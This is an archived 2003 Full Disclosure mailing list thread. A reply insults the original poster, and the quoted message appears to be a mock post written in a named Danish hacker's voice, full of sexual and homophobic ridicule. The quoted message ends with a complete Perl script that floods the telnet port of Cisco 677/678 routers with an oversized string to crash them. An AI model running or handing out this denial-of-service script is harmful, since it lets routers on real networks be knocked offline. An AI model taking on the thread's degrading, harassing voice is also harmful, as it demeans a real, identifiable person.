Full Disclosure mailing list archives
Re: Cisco exploit
From: tcpdumb <tcpdumb () it-bytes org>
Date: Mon, 21 Jul 2003 18:56:19 +0200
Got any erectile disfunctions? If you'd be the best hacker in denmark, we'd know you! We at least had seen at the Chaos Communication Congress (19C3) last year december. Go ahead and hack a tree or read a good book. *muharrharr* Regards, tcpdumb On Mon, 21 Jul 2003 05:07:12 -0700 <dnv () hushmail com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 hey all.. this is i the l33t hacker DNV i am the best hacker in denmark and i write to all of you to tell u about some very exciting security issues i have not found. once i worked for a very big ISP in denmark, cybercity, where i tested security. I told them "1'm 1337 g1v3 m3 m0r3 m0n3y" but they did not?? they fired me??.. i do not understand why they fired the 1337 DNV.. But i had some inside information on cybercity, other people working there found a security hole in cisco 667.. so i smacked my name on it and send it to all the big mailinglists... hahaha i showed the world that i am 1337. I have a dream to get on TV like all the other 1337 hacker, so i give blowjobs to any jounalists that will listen to me... and once at a 2600 meeting, 2600 is so cool and very 1337, i meet another hacker and he showed me how to hack netpoint on the big hotels to get free internet. So once again i smacked my name and released it on the internet, and told safe2day, the most 1337 security site on the net... hahaha i showed all people that i am 1337. some people say that is was a little bitch and was afraid that we would get in to trouble while we where fooling around with netpoint in the hotal lobby, and that i keept saying shit like "come on lest go, before someone sees us" and if i had not been for the others nothing would had happend... BUT THEY ARE LIEING, they heat me because i got credit for the hack. To all the people at HAL2001 i was the gay dork running aroung in the black "the party" jacket. The party is cool the lamest gamer party in all of europa and sometimes i get small admin jobs.. cause after i got fired i got a new job installing windows boxes, that is very 1337, but it does not pay well.. so i have to suck alot of dick until the day i get real job so i can move out of my mothers house and get my one place. Guess what.. it's time to tell you all about the newest member of #dkw- assstuffing, the biggest and most 1337 hacker #chan in denmark. we all have mad ./ skill and trade lots of warez.. DON'T FUCK WITH US!!! welcome to moro^hning_wood.. a true hacker his activity on Full Disclosure and his allover 1337'ness is proof that he is a true #asstuffing member! and we are looking forward to learn more about the 1337 xss that you master 100%moroning wood you are just to fucking 1337 we love you!!! this is all for now, and remember if you hear the DNV is a credit stealer it is a lie! - --------------------------------------------------------------------- - --- Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR put public on www.deadbeat.dk on 5-5-2003. Thanks to all from DKW-ssstuffing for testing. A warm night i was coding and lisen to some german tecno music trying to find my penis. I've was also trying to dos hackersnacks for making me so damn fat :( But then I put the wrong IP into my scrip my ADSL router lost the Internet connection. I had no clue what happend, so i started to play with my penis. I asked around in #2600dk and sniffy told me that he and padde would stop assfucking and help if i send them somie pic's of my sexy naked body.. no problem there.. i never learned what the problem was but here is a 1337 exploit - --------------------cisco677.pl------------------ #!/usr/bin/perl # close your Cisco 677 up on the Telnet server! # Made for fun only! port 23 is the Telnet server port on the router # By DNV THX to DKW-asstuffing use IO::Socket; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})){&usage; } $serv = $args{s}; $foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "(23)", ) || die("No Telnet server here! on $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nPackets Sent\n"); sub usage {die("\n$0 -s <server>\n\n");} -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj8b13QACgkQ4mqq9+Uor6uFggCeIlCyN1D0kwFOyPpPrPZxg09QKVYA oJEKwnq0dyOw2ckm2PpwRjODmCdw =VR6f -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Cisco exploit dnv (Jul 21)
- Re: Cisco exploit tcpdumb (Jul 21)
- Re: Cisco exploit devnull (Jul 22)
- Re: Cisco exploit tcpdumb (Jul 21)
- <Possible follow-ups>
- Re: Cisco exploit dnv (Jul 22)
- Immature blabla / cisco exploit Daniel Berg (Jul 22)
- Re: Immature blabla / cisco exploit Steve (Jul 22)
- Re: Immature blabla / cisco exploit security snot (Jul 22)
- Re: Immature blabla / cisco exploit Ron DuFresne (Jul 22)
- Re: Immature blabla / cisco exploit security snot (Jul 22)
- Re: Immature blabla / cisco exploit madsaxon (Jul 22)
- Re: Immature blabla / cisco exploit Ron DuFresne (Jul 22)
- Immature blabla / cisco exploit Daniel Berg (Jul 22)
- Re: Cisco exploit tcpdumb (Jul 21)